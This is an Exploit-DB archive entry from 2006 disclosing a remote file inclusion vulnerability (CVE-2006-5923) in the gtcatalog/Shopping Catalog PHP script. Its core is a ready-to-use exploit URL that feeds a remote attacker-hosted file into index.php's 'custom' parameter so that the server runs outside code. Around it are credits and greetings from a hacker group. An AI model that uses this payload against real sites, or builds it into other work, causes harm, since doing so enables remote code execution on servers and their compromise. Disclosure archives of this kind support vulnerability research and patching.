gtcatalog <= 0.9.1 index.php Remote File Include Vulnerability

2006-11-09T00:00:00
ID EDB-ID:2745
Type exploitdb
Reporter v1per-haCker
Modified 2006-11-09T00:00:00

Description

gtcatalog <= 0.9.1 (index.php) Remote File Include Vulnerability. CVE-2006-5923. Webapps exploit for php platform

                                        
                                            #=============================================================================================
#  Shopping Catalog (RFI)
#=============================================================================================
# Info:-
#
# Scripts: Shopping_Catalog
# download : http://www.gimescripts.com/categories/11%20Shopping%20Catalog%20PHP%20Script.zip
# Version : -
# Dork & vuln : download scripts and think :)
#
#=============================================================================================
#Exploit :
#
#http://localhost/path/index.php?function=custom&custom=http://EvElCoDe.txt?
#
#=============================================================================================
#Discoverd By : v1per-haCker
#
#Conatact : v1per-hacker[at]hotmail.com
#
#XP10_hackEr Team               &gt;&gt;      www.xp10.com
#SpeciaL PoweR SecuritY TeaM    &gt;&gt;      www.specialpower.org
#
#Greetz to :    | abu_shahad | RooT-shilL | hitler_jeddah | BooB11 | FaTaL  |
#               | ThE-WoLf-KsA | mohandko | fooooz | maVen | ShikAa | K3BAB |
#               | metoovet | MooB | Dr.7zN | ToOoFA | Cold Zero | Afroota   |
#               | MainstreaM | CoDeR | Simo-64 | Super-CrystaL | KoolholiO  |
#               |  MuhaciR  | Skrmhcr-GVinux | Jean |
#
# Thanks &gt;&gt;     /str0ke & www.milw0rm.com & www.google.com
#==============================================================================================

# milw0rm.com [2006-11-09]